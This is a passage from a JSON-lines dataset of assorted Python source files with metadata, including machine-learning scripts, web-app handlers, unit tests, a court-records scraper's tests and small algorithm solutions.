'success',\n float(time.clock() - src_start_time), {\n 'articlesCrawledCount': src_art_count,\n 'crawlerName': 'credible crawler'\n })\n\n if PY_ENV == 'development':\n print('\\n' + source.domain + ' done!')\n sleep(randrange(2, 6))\n","sub_path":"crawler/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":20508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"482191881","text":"import pandas as pd\nimport numpy as np\nfrom catboost import CatBoostClassifier\nfrom sklearn.model_selection import GridSearchCV, StratifiedKFold\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import log_loss, accuracy_score\nfrom collections import defaultdict\nfrom tqdm import tqdm\nimport seaborn as sns\nimport math\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nfrom multiprocessing import Pool\n\nimport matplotlib.pyplot as plt\n\npca = PCA()\n\ntext_file=open('training.txt','w')\n\nMAX_DEPTH = [6, 8, 10]\nLEARNING_RATE = [0.01, 0.005]\nITERATIONS = [1500, 1750, 2000, 2250]\nL2_NORM = [0, 15, 30]\nL1 = len(MAX_DEPTH)\nL2 = len(LEARNING_RATE)\nL3 = len(ITERATIONS)\nL4 = len(L2_NORM)\n\n# read in data\ntraining = pd.read_csv('first_round_training_data.csv')\ntesting = pd.read_csv('first_round_testing_data.csv')\nfeatures = [\"Parameter5\",\"Parameter6\",\"Parameter7\",\"Parameter8\",\"Parameter9\",\"Parameter10\"]\n\ntraining[features] = np.log(training[features].values)/np.log(10)\ntesting[features] = np.log(testing[features].values)/np.log(10)\n\ncode = {'Pass':1, 'Good':2, 'Excellent':3, 'Fail':0}\ntraining['new_Quality'] = training['Quality_label'].apply(lambda x : code[x])\n\nN = 10\n\nskf = StratifiedKFold(n_splits=N, shuffle=True, random_state=302)\nindices = []\nfor train_index, test_index in skf.split(training[features], training[['new_Quality']]):\n indices.append([train_index, test_index])\n\ndef target_mean_encoding_fit(variables, targets):\n '''\n This function returns the codebook to target mean encoding of the input categorical variable\n Input variable can be integers, strings or values, targets are the labels, which should be float numbers\n \n It returns the codebook from variable values to its encoding\n '''\n df = pd.DataFrame({'variable': variables, 'targets':targets})\n codebook = defaultdict(lambda : np.mean(targets))\n df = df.groupby(['variable'], as_index=False).agg('mean')\n for i in range(df.shape[0]):\n codebook[df.iloc[i, 0]] = df.iloc[i, 1]\n return codebook\n\ndef target_mean_encoding_apply(variables, codebook):\n '''\n This function returns the target mean encoding of the input categorical variable\n Input variable can be integers, strings or values, codebook is the rules to follow to get encodings.\n This codebook should be the output of traget_mean_encoding_fit()\n \n It returns the encoded values\n '''\n result = []\n all_keys = list(codebook.keys())\n for value in variables:\n if value in codebook.keys():\n result.append(codebook[value])\n else:\n index = np.argmin((np.array(all_keys) - value)**2)\n result.append(codebook[all_keys[index]])\n return result\n\ndef get_target_mean_encoding(training, validation, col_list, target_name):\n '''\n Use previous funcionts to transform the columns in col_list to their mean target encoding\n The transformation is in both training and validation set\n target_name is the name of column which is the label\n \n Return the transformed training/validation datasets\n '''\n for column in col_list:\n codebook = target_mean_encoding_fit(training[column].values, training[target_name].values)\n training.loc[:, column] = target_mean_encoding_apply(training[column], codebook)\n validation.loc[:, column] = target_mean_encoding_apply(validation[column], codebook)\n \n return training, validation\n\ndef get_all_encoding(training, validation, col_list):\n new_features = []\n for column in col_list:\n for level in ['Fail', 'Pass', 'Good', 'Excellent']:\n codebook = target_mean_encoding_fit(training[column].values, training['Quality_label'].values==level)\n new_name = '{}_{}'.format(column, level)\n new_features.append(new_name)\n training[new_name] = target_mean_encoding_apply(training[column], codebook)\n validation[new_name] = target_mean_encoding_apply(validation[column], codebook)\n return training, validation, new_features\n\ndef weight_of_evidence_fit(variables, targets, base=0.5):\n '''\n This function returns the weight of evidence (WoE) encoding for the input categorical variable\n Input variable can be integers, strings or values\n Input targets must be 0-1 one hot encoding\n \n It returns the codebook from values to WoE\n '''\n total_1 = np.sum(targets==1)\n total_0 = np.sum(targets==0)\n codebook = defaultdict(lambda : np.mean(targets))\n df = pd.DataFrame({'variable': variables, 'targets':targets})\n df = pd.crosstab(variables, targets)\n values = df.index.values\n for i in range(df.shape[0]):\n in_group_1 = df.iloc[i, 1]\n in_group_0 = df.iloc[i, 0]\n codebook.update({values[i] : np.log((in_group_0+base)/(in_group_1+base)) + np.log(total_1/total_0)})\n return codebook\n\ndef weight_of_evidence_apply(variables, codebook):\n result = []\n all_keys = list(codebook.keys())\n for value in variables:\n if value in codebook.keys():\n result.append(codebook[value])\n else:\n index = np.argmin((np.array(all_keys) - value)**2)\n result.append(codebook[all_keys[index]])\n return np.array(result)\n\ndef get_all_WoE(training, validation, col_list, base=0.5):\n new_features = []\n for column in col_list:\n for level in ['Fail', 'Pass', 'Good', 'Excellent']:\n codebook = weight_of_evidence_fit(training[column], training['Quality_label']==level, base)\n new_name = '{}_WoE_{}'.format(column, level)\n new_features.append(new_name)\n training[new_name] = weight_of_evidence_apply(training[column].values, codebook)\n validation[new_name] = weight_of_evidence_apply(validation[column].values, codebook)\n return training, validation, new_features\n'''\n#No encoding No PCA\ntext_file.write('No encoding no PCA\\n')\nnew_features = ['Parameter'+str(i) for i in [5, 7, 8, 9, 10]]\ntrain_all, test_all = training.copy(), testing.copy()\nnew_features = new_features\n\n#No encoding at all\ntext_file.write('No Encoding\\n')\nnew_features = ['Parameter'+str(i) for i in range(5, 11)]\ntrain_all, test_all = training.copy(), testing.copy()\nnew_values = pca.fit_transform(pd.concat([train_all[new_features], test_all[new_features]]))\ntrain_all[new_features] = new_values[:6000, :].copy()\ntest_all[new_features] = new_values[6000:, :].copy()\nnew_features = new_features[:5]\ntext_file.write('Number of features : {}\\n'.format(len(new_features)))\n'''\n#target mean encoding\ntext_file.write('All target mean encoding\\n')\ntrain_all, test_all, new_features = get_all_encoding(training, testing, features)\nnew_values = pca.fit_transform(pd.concat([train_all[new_features], test_all[new_features]]))\ntrain_all[new_features] = new_values[:6000, :].copy()\ntest_all[new_features] = new_values[6000:, :].copy()\nnew_features = new_features[:15]\ntext_file.write('Number of features : {}\\n'.format(len(new_features)))\n'''\n#WoE encoding\ntext_file.write('All WoE encoding\\n')\ntrain_all, test_all, new_features = get_all_WoE(training, testing, features)\nnew_values = pca.fit_transform(pd.concat([train_all[new_features], test_all[new_features]]))\ntrain_all[new_features] = new_values[:6000, :].copy()\ntest_all[new_features] = new_values[6000:, :].copy()\nnew_features = new_features[:14]\ntext_file.write('Number of features : {}\\n'.format(len(new_features)))\n'''\ndef i_to_tuple(i):\n n1 = math.floor(i/(L2*L3*L4))\n n2 = math.floor(i/(L3*L4)) % L2\n n3 = math.floor(i/L4) % L3\n n4 = i % L4\n return (n1, n2, n3, n4) \n\ndef my_CV(params):\n i, iterations, depth, learning_rate, l2_leaf_reg = params\n train_index = indices[i][0]\n test_index = indices[i][1]\n model = CatBoostClassifier(iterations=iterations, \n depth=depth, \n learning_rate=learning_rate, \n silent=True, \n loss_function='MultiClass', \n l2_leaf_reg=l2_leaf_reg)\n X_train = train_all.loc[train_index, new_features]\n y_train = train_all.loc[train_index, ['new_Quality']]\n X_test = train_all.loc[test_index, new_features]\n y_test = train_all.loc[test_index, ['new_Quality']]\n model.fit(X=X_train, y=y_train, eval_set=(X_test, y_test))\n train_probs = model.predict_proba(X_train)\n train_predictions = model.predict(X_train)\n train_accuracy = accuracy_score(y_train, train_predictions)\n train_neg_log_loss = -log_loss(y_train, train_probs)\n test_probs = model.predict_proba(X_test)\n test_neg_log_loss = -log_loss(y_test, test_probs)\n test_predictions = model.predict(X_test)\n test_accuracy = accuracy_score(y_test, test_predictions)\n return (train_accuracy, train_neg_log_loss, test_accuracy, test_neg_log_loss)\n\npool = Pool(processes = N)\nresults = np.zeros((L1*L2*L3*L4, 4))\n\nfor i in tqdm(range(L1*L2*L3*L4)):\n n1, n2, n3, n4 = i_to_tuple(i)\n iterations = ITERATIONS[n3]\n depth = MAX_DEPTH[n1]\n learning_rate = LEARNING_RATE[n2]\n l2_leaf_reg = L2_NORM[n4]\n results[i, :] = np.mean(np.array(pool.map(my_CV, [(j, iterations, depth, learning_rate, l2_leaf_reg) for j in range(N)])), axis=0)\n\nindex = np.argsort(-results[:, 3])#sort by test neg log loss, decreasing order\nn1, n2, n3, n4 = i_to_tuple(index[0])\ntext_file.write('Best configuration is : {} iterations,\\n\\t{} depth,\\n\\t{} learning rate and\\n\\t{} l2 regularization\\n'.format(ITERATIONS[n3], MAX_DEPTH[n1], LEARNING_RATE[n2], L2_NORM[n4]))\n\ntext_file.write('Top five train accuracy : {}\\n'.format(results[index[:5], 0]))\ntext_file.write('Top five train neg log loss : {}\\n'.format(results[index[:5], 1]))\ntext_file.write('Top five test accuracy : {}\\n'.format(results[index[:5], 2]))\ntext_file.write('Top five test neg log loss: {}\\n'.format(results[index[:5], 3]))\n\ntext_file.close()\nnp.save('results.npy', results)\n","sub_path":"CCF Production Quality Prediction/my_GridSearch.py","file_name":"my_GridSearch.py","file_ext":"py","file_size_in_byte":9887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"79223175","text":"#External\nimport discord\nfrom dateparser.search import search_dates\n#Python\nimport asyncio\nfrom datetime import datetime as dtime\nfrom datetime import timezone\n\n\nclass Utility:\n\n bot = None\n db_cluster = None\n embed_color = None\n\n @classmethod\n def setup(cls, bot, db_cluster, embed_color):\n cls.bot = bot\n cls.db_cluster = db_cluster\n cls.embed_color = embed_color\n\n @staticmethod\n def is_integer(s):\n # check if a string is an integer (includes negative integers)\n try: \n int(s)\n return True\n except ValueError:\n return False\n\n @staticmethod\n def date_from_txt(s):\n # needed because replace cannot be called on None\n if search_dates(s):\n return search_dates(s)[0][1].replace(tzinfo = timezone.utc)\n\n @staticmethod\n def text_to_boolean(flag):\n if flag in ['True', 'true']:\n return True\n elif flag in [ 'False', 'false']:\n return False\n \n @classmethod\n async def confirm_action(cls, res, actor):\n\n tick_emote = u\"\\u2705\"\n cross_emote = u\"\\U0001F6AB\"\n await res.add_reaction(tick_emote)\n await res.add_reaction(cross_emote)\n\n def check(reaction, user):\n reacted_emote = str(reaction.emoji)\n return reaction.message.id == res.id and user == actor and (reacted_emote == tick_emote or reacted_emote == cross_emote)\n try:\n reaction, user = await cls.bot.wait_for('reaction_add', timeout = 60.0, check=check)\n except asyncio.TimeoutError:\n # if overtime, send timeout message and return\n return False\n\n # if cancelled, send cancellation message and return\n if str(reaction.emoji) == cross_emote:\n return False\n\n return True\n\n @classmethod\n def get_vtuber(cls, guild_id):\n settings_db = cls.db_cluster[\"settings\"][\"general\"]\n result = settings_db.find_one({}, {'supported_idols' : { '$elemMatch': {'guild_id' : guild_id}}})\n if 'supported_idols' in result:\n return result['supported_idols'][0]['name']\n else:\n return \"not supported server\"\n\n @classmethod\n def create_supported_vtuber_embed(cls):\n settings = cls.db_cluster['settings']['general']\n array = settings.find_one({}, {'supported_idols'})['supported_idols']\n\n # list every vtuber like \"- \"\n vtuber_list = \"- \" + '\\n- '.join(element['name'] for element in array)\n title = \"Supported VTuber\"\n\n return discord.Embed(title = title, description = vtuber_list, colour = cls.embed_color)\n","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"270538883","text":"def solution(N):\n string = to_binary(N)\n result = count_binary_gap(string)\n return result\n\ndef to_binary(N):\n result = \"\"\n i = 2**32\n while N > 0:\n if N // i > 0:\n result += '1'\n N -= i\n else:\n result += '0'\n i /= 2\n\n return result\n\ndef count_binary_gap(string):\n count_zeros = 0\n remember_me = 0\n flag_one_seen = False\n print(len(string))\n for char in string:\n if char == '0' and flag_one_seen:\n count_zeros += 1\n\n elif char == '1':\n if count_zeros > remember_me:\n remember_me = count_zeros\n count_zeros = 0\n flag_one_seen = True\n return remember_me\n\n\n\n\n\n","sub_path":"t1_binary_gap/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"415576730","text":"from __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nimport os\nfrom .bbox import Box\nfrom tqdm import tqdm\nfrom .tfrecord_utils import convert_to, input_fn, es_input_fn\n\n\n\nclass Data:\n def __init__(self, classes_text=None, image_size=(800,800,3),batch_size=32, shuffle_buffer_size=4, prefetch_buffer_size=1,num_parallel_calls=4 , num_parallel_readers=1):\n if classes_text:\n with open(classes_text) as f:\n self.class_names = []\n for lines in f.readlines():\n arr = lines.strip().split(',')\n self.class_names.append(arr[-1])\n self.image_size = image_size\n self.batch_size = batch_size\n self.shuffle_buffer_size = shuffle_buffer_size\n self.prefetch_buffer_size = prefetch_buffer_size\n self.num_parallel_calls = num_parallel_calls\n self.num_parallel_readers = num_parallel_readers\n \n def get_batch(self,filenames=None,es=False):\n if es:\n return es_input_fn(self,filenames)\n return input_fn(self, filenames)\n \n \n \n\n\nclass PreProcessData:\n def __init__(self,classes_text='./dummy_labels.txt',image_size=(800,800)):\n self.images = None\n self.labels = None\n self.image_size=image_size\n with open(classes_text) as f:\n self.class_names = []\n for lines in f.readlines():\n arr = lines.strip().split(',')\n self.class_names.append(arr[0])\n\n def load_mot(self,mot_dir):\n self.images = []\n self.labels = []\n self.name = 'MOT_Training'\n pbar = tqdm(os.listdir(mot_dir))\n max_boxes = 0\n for folder in pbar:\n if '.' in folder:\n continue\n height = 0\n width = 0\n with open(mot_dir+folder+'/seqinfo.ini','r') as info:\n for lines in info:\n if 'imWidth' in lines:\n lines = lines.split('=')\n width = float(lines[1])\n elif 'imHeight' in lines:\n lines = lines.split('=')\n height = float(lines[1])\n else:\n continue\n assert height!=0\n assert width!=0\n with open(mot_dir+folder+'/gt/gt.txt','r') as gt:\n dict_annot = {}\n dict_annot['frame'] = {}\n for index, lines in enumerate(gt):\n splitline = [float(x.strip()) for x in lines.split(',')]\n label = int(splitline[7])-1\n x_val = splitline[2]\n y_val = splitline[3] \n box_width = splitline[4]\n box_height = splitline[5]\n\n x_center = x_val +(box_width/2.)\n y_center = y_val +(box_height/2.)\n box = Box()\n box.calculate_xyxy(x_center,y_center,box_width,box_height)\n box.label = label\n frame_id = int(splitline[0])\n if frame_id not in dict_annot['frame']:\n dict_annot['frame'][frame_id] = []\n dict_annot['frame'][frame_id].append(box)\n for frame_id in sorted(dict_annot['frame'].keys()):\n img = mot_dir+folder+'/img1/'+str(frame_id).zfill(6)+'.jpg'\n boxes = dict_annot['frame'][frame_id]\n boxes = np.array(boxes)\n self.images.append((img,height,width,3))\n if max_boxes < boxes.shape[0]:\n max_boxes = boxes.shape[0]\n self.labels.append(boxes)\n self.images = np.array(self.images)\n self.labels = np.array(self.labels)\n self.num_examples = self.images.shape[0]\n self.max_boxes = max_boxes\n\n def get_open_images(self,filedir,data_type='train'):\n import csv\n self.images = []\n self.labels = []\n self.name='OpenImages'+'-'+data_type\n self.max_boxes = 0\n self.num_examples = 0\n annotations_file = filedir+'annotations/' + '{}-bbox.csv'.format(data_type)\n with open(annotations_file,'r') as csvfile:\n bbox_reader = csv.reader(csvfile,delimiter=',')\n print(\"Open Images contains a large number of files, do not be discourage if it takes a long time.\")\n next(bbox_reader)\n dict_annot = {}\n pbar = tqdm(bbox_reader)\n pbar.set_description(\"Reading Annotations\")\n for elem in pbar:\n filename = elem[0]\n label = elem[2]\n xmin = float(elem[4])\n xmax = float(elem[5])\n ymin = float(elem[6])\n ymax = float(elem[7])\n #convert label to int\n label = self.class_names.index(label) \n box = Box(x0=xmin, y0 = ymin, x1=xmax, y1=ymax,label=label)\n if filename not in dict_annot.keys():\n dict_annot[filename] = []\n height=1\n width=1\n #need to read the image height and width every time we run into a new filename\n dict_annot[filename].append(box)\n for filename in dict_annot.keys():\n image_name = filedir+data_type+'/'+filename+'.jpg'\n boxes = np.array(dict_annot[filename])\n self.images.append((image_name,height,width))\n if self.max_boxes < boxes.shape[0]:\n self.max_boxes = boxes.shape[0]\n self.labels.append(boxes)\n self.images = np.array(self.images)\n self.labels = np.array(self.labels)\n self.num_examples = self.images.shape[0]\n \n\n\n\n def write_tf(self,directory,num_shards = 1):\n convert_to(self,directory,self.name,num_shards=num_shards)\n\n","sub_path":"old/Pipeline/data/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"93514171","text":"import unittest\nfrom mox3.mox import MoxTestBase, IgnoreArg\nfrom gevent import socket\n\nfrom slimta import util\n\n\nclass TestIPv4SocketCreator(MoxTestBase):\n\n def setUp(self):\n super(TestIPv4SocketCreator, self).setUp()\n self.mox.StubOutWithMock(socket, 'create_connection')\n self.mox.StubOutWithMock(socket, 'getaddrinfo')\n self.getaddrinfo = self.mox.CreateMock(socket.getaddrinfo)\n self.socket_creator = util.build_ipv4_socket_creator([25])\n\n def test_other_port(self):\n socket.create_connection(('host', 443), 'timeout', 'source').AndReturn('socket')\n self.mox.ReplayAll()\n ret = self.socket_creator(('host', 443), 'timeout', 'source')\n self.assertEqual('socket', ret)\n\n def test_successful(self):\n socket.getaddrinfo('host', 25, socket.AF_INET).AndReturn([(None, None, None, None, 'sockaddr')])\n socket.create_connection('sockaddr', IgnoreArg(), IgnoreArg()).AndReturn('socket')\n self.mox.ReplayAll()\n ret = self.socket_creator(('host', 25), 'timeout', 'source')\n self.assertEqual('socket', ret)\n\n def test_error(self):\n socket.getaddrinfo('host', 25, socket.AF_INET).AndReturn([(None, None, None, None, 'sockaddr')])\n socket.create_connection('sockaddr', IgnoreArg(), IgnoreArg()).AndRaise(socket.error('error'))\n self.mox.ReplayAll()\n with self.assertRaises(socket.error):\n self.socket_creator(('host', 25), 'timeout', 'source')\n\n def test_no_addresses(self):\n socket.getaddrinfo('host', 25, socket.AF_INET).AndReturn([])\n self.mox.ReplayAll()\n with self.assertRaises(socket.error):\n self.socket_creator(('host', 25), 'timeout', 'source')\n\n\n# vim:et:fdm=marker:sts=4:sw=4:ts=4\n","sub_path":"test/test_slimta_util.py","file_name":"test_slimta_util.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"256855952","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom datetime import datetime\nfrom flask import render_template,session,redirect,url_for,flash\n\nfrom . import main\nfrom .forms import NameForm\nfrom .. import db\nfrom ..db_config import User\nfrom .. import create_app\nfrom ..email_config import send_email\n\napp = create_app('default')\n@main.route('/', methods=['GET', 'POST'])\ndef index():\n form = NameForm()\n if form.validate_on_submit():\n old_name = session.get('name')\n if old_name is not None and old_name != form.name.data:\n flash('注意!你改变了你的登录名。')\n user = User.query.filter_by(username=form.name.data).first()\n if user is None:\n user = User(username=form.name.data)\n db.session.add(user)\n session['known'] = False\n ##发送邮件\n if app.config['MAIL_ADMIN']:\n send_email(app.config['MAIL_ADMIN'], '新用户登录', template=form.name.data)\n else:\n session['known'] = True\n session['name'] = form.name.data\n form.name.data = ''\n return redirect(url_for('.index'))\n return render_template('index.html', current_time=datetime.utcnow(), form=form,\n name=session.get('name'),known=session.get('known', False))\n\n@main.route('/user/')\ndef user(name):\n return render_template('user.html',current_time=datetime.utcnow(),name=name)","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"536616471","text":"import uvicorn\nfrom fastapi import FastAPI \n\nimport joblib,os\n\nmodel_file = open(\"models/model_joblib\",\"rb\")\nmodel_condo = joblib.load(model_file)\n\n#init app\napp = FastAPI()\n\n#Routes\n@app.get('/')\nasync def index():\n return {\"text\": \"Hello API Builders\"}\n\n@app.get('/items/{name}')\nasync def get_items(name):\n return {\"name\":name}\n\n@app.get('/predict/{sqft}')\nasync def predict(sqft):\n result = model_condo.predict([[sqft]])\n return result[0]\n\nif __name__ == '__main__':\n uvicorn.run(app,host=\"127.0.0.1\",port=8888)\n\n","sub_path":"machine-learning/ml_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"592006629","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10 ** 6)\n\n\ndef dfs(here):\n dp[here][0] = people[here-1]\n \n for there in tree[here]:\n if visit[there] == 0:\n visit[there] = 1\n dfs(there)\n\n dp[here][0] += dp[there][1]\n dp[here][1] += max(dp[there][0], dp[there][1])\n \n\nn = int(input())\npeople = list(map(int, input().split()))\ntree = [[] for x in range(n+1)]\n\n#dp[x][y] x번째가 0 -> 포함, 1 -> X 일때 최대값\ndp = [[0, 0] for x in range(n+1)]\n\nvisit = [0 for x in range(n+1)]\n\nfor x in range(n-1):\n a, b = map(int, input().split())\n tree[a].append(b)\n tree[b].append(a)\n\nvisit[1] = 1\ndfs(1)\n\nprint(max(dp[1][0], dp[1][1]))\n","sub_path":"Hangil/day10_1949_choi.py","file_name":"day10_1949_choi.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"604432614","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = \"lysdexia@gmail.com\"\n__version__ = \"dev\"\n\nimport json, os\nimport cherrypy\n\nfrom ScooterPhage import Define\n\nclass Index(object):\n @cherrypy.expose\n def default(self, **kwargs):\n return json.dumps(kwargs)\n\n\"\"\"\nClassify parts by type on bike: Mechanical, Body, FrameSuspension ...\nUsed to build language-specific part lists.\n\"\"\"\nclass Classify(object):\n Body = Define.Body()\n Mechanical = Define.Mechanical()\n FrameSuspension = Define.FrameSuspension()\n Language = Define.Language()\n\nif __name__ == \"__main__\":\n # global configuration file \n\n pth = os.path.dirname(os.path.abspath(__file__))\n conf = os.path.join(pth, \"Config/Kphretiq.conf\")\n cherrypy.config.update(conf)\n\n classify_conf = os.path.join(pth, \"Config/Classify.conf\")\n cherrypy.config.update(classify_conf)\n\n cherrypy.tree.mount(Index(), \"/\", conf)\n cherrypy.tree.mount(Classify(), \"/Classify\", classify_conf)\n\n cherrypy.engine.start()\n cherrypy.engine.block()\n","sub_path":"ScooterPhage.py","file_name":"ScooterPhage.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"245942292","text":"from app.civil import civil\nfrom app.laboral import laboral\nfrom app.tribunal import tribunal\nimport unittest\n\n\nclass Test(unittest.TestCase):\n\n def setUp(self):\n self.c = civil()\n self.l = laboral()\n self.t = tribunal()\n\n def tearDown(self):\n pass\n\n def TestTribunalesCivil(self):\n res = self.t.obtenerTribunalesCivil()\n hash_tribunales = res['TRIBUNALES'][1]['HASH']\n self.assertEquals(hash_tribunales, 'e66177e36f92a95b6ba90553a0338701')\n\n def TestTribunalesLaboral(self):\n res = self.t.obtenerTribunalesLaboral()\n hash_tribunales = res['TRIBUNALES'][1]['HASH']\n self.assertEquals(hash_tribunales, '9a58d1f9885c5dae05ae05185a1a8bb1')\n\n def TestCivilPorRit(self):\n cod_tribunal = '130'\n rit_causa = 'C-25-2015'\n res = self.c.porRit(cod_tribunal, rit_causa)\n hash_causa = res['CAUSA'][2]['HASH']\n caratula = self.c.dict_caratula['CARATULA'][0]['CARATULA']\n documentos = self.c.dict_documentos['DOCUMENTOS'][0]['DOCUMENTO']\n\n self.assertEquals(hash_causa, '08fde98c4d3460482e8ffc2989e45ee7')\n self.assertEquals(caratula, 'SCOTIABANK CHILE / CHAMORR')\n self.assertEquals(documentos, 'http://civil.poderjudicial.cl/CIVILPORWEB/DownloadFile.do?TIP_Documento=3&TIP_Archivo=3&COD_Opcion=1&COD_Tribunal=130&CRR_IdTramite=61570757&CRR_IdDocumento=54519474')\n\n def TestCivilPorRut(self):\n cod_tribunal = '110'\n rut_causa = '76075466-8'\n res = self.c.porRut(cod_tribunal, rut_causa)\n hash_causa = res['CAUSA'][2]['HASH']\n caratula = self.c.dict_caratula['CARATULA'][0]['CARATULA']\n documentos = self.c.dict_documentos['DOCUMENTOS'][0]['DOCUMENTO']\n\n self.assertEquals(hash_causa, '1053f41e1eb905ad529d1bc2376024f3')\n self.assertEquals(caratula, 'FONDO DE INVERSION PRIVADO')\n self.assertEquals(documentos, 'No incluye documento')\n\n def TestLaboralPorRit(self):\n cod_tribunal = '1351'\n rit_causa = 'T-69-2014'\n res = self.l.porRit(cod_tribunal, rit_causa)\n hash_causa = res['CAUSA'][2]['HASH']\n caratula = self.l.dict_caratula['CARATULA'][0]['CARATULA']\n documentos = self.l.dict_documentos['DOCUMENTOS'][0]['DOCUMENTO']\n\n self.assertEquals(hash_causa, 'f46e75523508e7699ef8559ebcc1e777')\n self.assertEquals(caratula, 'REYES CON DESARROLLO TERRE')\n self.assertEquals(documentos, 'http://laboral.poderjudicial.cl/SITLAPORWEB/DownloadFile.do?TIP_Documento=3&TIP_Archivo=1&COD_Opcion=1&COD_Tribunal=1351&CRR_IdCausa=325115&CRR_IdTramite=3960625&CRR_IdDocumento=4014653')\n\n def TestLaboralPorRuc(self):\n cod_tribunal = '1351'\n rit_causa = '14-4-0039155-7'\n res = self.l.porRuc(cod_tribunal, rit_causa)\n hash_causa = res['CAUSA'][2]['HASH']\n caratula = self.l.dict_caratula['CARATULA'][0]['CARATULA']\n documentos = self.l.dict_documentos['DOCUMENTOS'][0]['DOCUMENTO']\n self.assertEquals(hash_causa, 'f46e75523508e7699ef8559ebcc1e777')\n self.assertEquals(caratula, 'REYES CON DESARROLLO TERRE')\n self.assertEquals(documentos, 'http://laboral.poderjudicial.cl/SITLAPORWEB/DownloadFile.do?TIP_Documento=3&TIP_Archivo=1&COD_Opcion=1&COD_Tribunal=1351&CRR_IdCausa=325115&CRR_IdTramite=3960625&CRR_IdDocumento=4014653')\n\n def TestLaboralPorRut(self):\n cod_tribunal = '1351'\n rut_causa = '76167945-7'\n res = self.l.porRut(cod_tribunal, rut_causa)\n hash_causa = res['CAUSA'][2]['HASH']\n caratula = self.l.dict_caratula['CARATULA'][0]['CARATULA']\n documentos = self.l.dict_documentos['DOCUMENTOS'][0]['DOCUMENTO']\n\n self.assertEquals(hash_causa, '9c7252bf65d7880315cc6a67642490a4')\n self.assertEquals(caratula, 'IGB MONTAJES EIRL CON INSP')\n self.assertEquals(documentos, 'http://laboral.poderjudicial.cl/SITLAPORWEB/DownloadFile.do?TIP_Documento=3&TIP_Archivo=1&COD_Opcion=1&COD_Tribunal=1351&CRR_IdCausa=386225&CRR_IdTramite=4010675&CRR_IdDocumento=4064563')\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/testScraperPJUD.py","file_name":"testScraperPJUD.py","file_ext":"py","file_size_in_byte":4097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"624356722","text":"import os\nimport json\nimport unittest\nimport datetime\nimport jwt\nfrom test.v2.basetest import BaseTestCase\nfrom app import create_app\n\n\nclass TestParties(BaseTestCase):\n def setUp(self):\n super().setUp()\n\n self.parties_data2 = {\n \"name\": \"jubilee\",\n \"hqaddress\": \"Nairobi\",\n \"logourl\": \"photo.com\"\n }\n\n def test_create_party(self):\n response = self.create_party(self.parties_data)\n\n self.assertEqual(response.status_code, 201)\n\n def test_create_party_with_short_name(self):\n \"\"\" test for creating an party with a short name\"\"\"\n office = {\n \"name\": \"off\",\n \"hqaddress\": \"Nairobi\",\n \"logourl\": \"logourl\"\n }\n response = self.create_office(office)\n self.assertEqual(response.status_code, 400)\n\n def test_create_party_with_numbers(self):\n \"\"\" test for creating an party that contains a number\"\"\"\n office = {\n \"name\": \"party123\",\n \"hqaddress\": \"Nairobi\",\n \"logourl\": \"logourl\"\n }\n response = self.create_office(office)\n self.assertEqual(response.status_code, 400)\n\n def test_create_existing_party(self):\n \"\"\" test for creating an existing office\"\"\"\n self.create_party(self.parties_data)\n response = self.create_party(self.parties_data)\n self.assertEqual(response.status_code, 400)\n\n # def test_get_specific_party(self):\n # party = self.create_party(self.parties_data)\n # party_id = party.json[0][1]['party_id']\n # print(party_id)\n # response = self.get(\"api/v2/parties/{}\".format(party_id))\n # self.assertEqual(response.status_code, 200)\n\n def test_get_all_parties(self):\n self.create_party(self.parties_data)\n self.create_party(self.parties_data2)\n response = self.get(\"api/v2/parties\")\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json['parties']), 2)\n","sub_path":"test/v2/test_parties.py","file_name":"test_parties.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300965042","text":"import cv2\n\nimport numpy as np\nimport math\n\ndef cropBorders(img,tol=0): #https://codereview.stackexchange.com/questions/132914/crop-black-border-of-image-using-numpy answer by Divakar\n mask=img>0\n return img[np.ix_(mask.any(1),mask.any(0))]\n\nI=cv2.imread(\"LicensePlate.png\",0) #read image\ncv2.imshow(\"License Plate Original\", I)\n\nheight,width=I.shape[:2]\n\nM= cv2.getRotationMatrix2D((width/2,height/2),-15,1)\n\n\nsin = math.sin(M[0,0])\ncos = math.cos(M[0,1])\nbound_w = int((height * abs(sin)) + (width * abs(cos)))\nbound_h = int((height * abs(cos)) + (width * abs(sin)))\n\nM[0, 2] += ((bound_w / 2) - width/2)\nM[1, 2] += ((bound_h / 2) - height/2)\n\nJ1 = 